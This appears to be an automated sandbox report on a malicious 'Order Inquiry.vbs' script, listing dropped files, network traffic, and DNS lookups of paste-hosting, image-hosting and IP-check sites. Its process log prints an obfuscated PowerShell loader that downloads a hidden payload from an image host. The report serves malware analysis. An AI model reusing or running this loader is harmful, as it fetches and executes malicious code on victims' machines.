          SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
          MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
          SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
          SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
          SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
          Malicious:false
          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpC105.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.6732424250451717
          Encrypted:false
          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpC173.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):196608
          Entropy (8bit):1.1209886597424439
          Encrypted:false
          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
          Malicious:false
          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpCE79.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):155648
          Entropy (8bit):0.5407252242845243
          Encrypted:false
          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
          MD5:7B955D976803304F2C0505431A0CF1CF
          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
          Malicious:false
          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpDB30.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):155648
          Entropy (8bit):0.5407252242845243
          Encrypted:false
          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
          MD5:7B955D976803304F2C0505431A0CF1CF
          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
          Malicious:false
          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpE8C2.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.3528485475628876
          Encrypted:false
          SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
          MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
          SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
          SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
          SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpF3A4.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):196608
          Entropy (8bit):1.1209886597424439
          Encrypted:false
          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
          Malicious:false
          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Entropy (8bit):3.39871661864384
          TrID:
          • Text - UTF-16 (LE) encoded (2002/1) 64.44%
          • MP3 audio (1001/1) 32.22%
          • Lumena CEL bitmap (63/63) 2.03%
          • Corel Photo Paint (41/41) 1.32%
          File name:Order Inquiry.vbs
          File size:240'822 bytes
          MD5:443f85c9a27129786164968923b47193
          SHA1:a45f63374b28561a0152e261bd57e5a2bb9c54f9
          SHA256:f3ff35c81d1f64fe7a0f1fb55e1c732d091b8faedc4fcd35eef9d0afe5455a63
          SHA512:3ef8963f3745ba562da95d7263550d291a86aaefb952373d165972e7d8aea91cf051aaab5949b8d9605897cd6b049674576d9a50453423beba9061f503288eb2
          SSDEEP:3072:nBaHznXmxLLCg5Hmgw/kYFvhte41TdRnTTcQYT2X5K0ybU:Xw/kYFJ5Ky
          TLSH:7834C35263EA4008F2F73F54A9BA55214B3BBDD9AD79CA4D418C296D0BE3940CCB1B73
          File Content Preview:..P.r.i.v.a.t.e. .S.u.b. .S.e.t.D.n.s.P.u.b.l.i.s.h.i.n.g.D.i.s.a.b.l.e.d.(.b.o.o.l.)..... . . . .D.i.m. .o.b.j.S.e.r.v.i.c.e.,. .o.b.j.P.r.o.d.u.c.t..... . . . .D.i.m. .k.m.s.F.l.a.g.,. .l.R.e.t.,. .d.w.V.a.l.u.e......... . . . .O.n. .E.r.r.o.r. .R.e.s.u

          File Icon

          Icon Hash:68d69b8f86ab9a86

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Jun 14, 2024 15:15:00.293201923 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:00.293231964 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:00.293332100 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:00.386943102 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:00.386977911 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:00.993308067 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:00.993397951 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.066081047 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.066135883 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.066443920 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.066509962 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.068896055 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.116504908 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352607012 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352648020 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352694035 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.352709055 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352720022 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352741003 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.352762938 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352763891 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.352772951 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.352806091 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.380480051 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.380582094 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.380605936 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.380655050 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.468863010 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.468918085 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.468925953 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.468945980 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.468957901 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.469001055 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.469007969 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.469026089 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:01.469044924 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.469072104 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.469535112 CEST49706443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:01.469553947 CEST44349706188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:03.963193893 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:03.963236094 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:03.963356018 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:03.970993996 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:03.971012115 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:04.579335928 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:04.579432011 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:04.581254005 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:04.581271887 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:04.581520081 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:04.588221073 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:04.632497072 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280198097 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280235052 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280260086 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280283928 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280308962 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280337095 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.280353069 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280380964 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280390978 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.280405045 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280416965 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.280421019 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.280441046 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.333554983 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.333575964 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.380434990 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.396469116 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.396521091 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.396539927 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.396560907 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.396584034 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.396599054 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.396624088 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.396652937 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.396681070 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.397165060 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.397197008 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.397234917 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.397239923 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.398011923 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.398036003 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.398056984 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.398060083 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.398066998 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.398091078 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.398094893 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.398133039 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.398137093 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.416148901 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.416234016 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.416260958 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.416364908 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.416399002 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.416423082 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.416423082 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.416436911 CEST44349707188.114.97.3192.168.2.8
          Jun 14, 2024 15:15:05.416496992 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.458592892 CEST49707443192.168.2.8188.114.97.3
          Jun 14, 2024 15:15:05.513052940 CEST44349707188.114.97.3192.168.2.8

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Jun 14, 2024 15:15:00.275892019 CEST6087553192.168.2.81.1.1.1
          Jun 14, 2024 15:15:00.286645889 CEST53608751.1.1.1192.168.2.8
          Jun 14, 2024 15:15:03.947308064 CEST4991953192.168.2.81.1.1.1
          Jun 14, 2024 15:15:03.958914042 CEST53499191.1.1.1192.168.2.8
          Jun 14, 2024 15:15:16.027129889 CEST6151853192.168.2.81.1.1.1
          Jun 14, 2024 15:15:16.045623064 CEST53615181.1.1.1192.168.2.8
          Jun 14, 2024 15:15:20.747736931 CEST53570451.1.1.1192.168.2.8
          Jun 14, 2024 15:15:23.819113970 CEST6495653192.168.2.81.1.1.1
          Jun 14, 2024 15:15:23.827912092 CEST53649561.1.1.1192.168.2.8
          Jun 14, 2024 15:15:25.274831057 CEST6140953192.168.2.81.1.1.1
          Jun 14, 2024 15:15:25.284375906 CEST53614091.1.1.1192.168.2.8
          Jun 14, 2024 15:15:26.240533113 CEST6305953192.168.2.81.1.1.1
          Jun 14, 2024 15:15:26.249100924 CEST53630591.1.1.1192.168.2.8

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Jun 14, 2024 15:15:00.275892019 CEST192.168.2.81.1.1.10xf2feStandard query (0)paste.eeA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:03.947308064 CEST192.168.2.81.1.1.10x3232Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:16.027129889 CEST192.168.2.81.1.1.10xb860Standard query (0)whatismyipaddressnow.coA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:23.819113970 CEST192.168.2.81.1.1.10x3d6fStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:25.274831057 CEST192.168.2.81.1.1.10xfa1Standard query (0)75.103.13.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
          Jun 14, 2024 15:15:26.240533113 CEST192.168.2.81.1.1.10x8d11Standard query (0)ip-api.comA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Jun 14, 2024 15:15:00.286645889 CEST1.1.1.1192.168.2.80xf2feNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:00.286645889 CEST1.1.1.1192.168.2.80xf2feNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:03.958914042 CEST1.1.1.1192.168.2.80x3232No error (0)uploaddeimagens.com.br188.114.97.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:03.958914042 CEST1.1.1.1192.168.2.80x3232No error (0)uploaddeimagens.com.br188.114.96.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:16.045623064 CEST1.1.1.1192.168.2.80xb860No error (0)whatismyipaddressnow.co188.114.96.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:16.045623064 CEST1.1.1.1192.168.2.80xb860No error (0)whatismyipaddressnow.co188.114.97.3A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:23.827912092 CEST1.1.1.1192.168.2.80x3d6fNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:23.827912092 CEST1.1.1.1192.168.2.80x3d6fNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
          Jun 14, 2024 15:15:25.284375906 CEST1.1.1.1192.168.2.80xfa1Name error (3)75.103.13.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
          Jun 14, 2024 15:15:26.249100924 CEST1.1.1.1192.168.2.80x8d11No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • paste.ee
          • uploaddeimagens.com.br
          • whatismyipaddressnow.co
          • 93.123.39.71
          • icanhazip.com
          • ip-api.com

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:09:14:58
          Start date:14/06/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
          Imagebase:0x7ff7d1bb0000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:3
          Start time:09:15:01
          Start date:14/06/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTre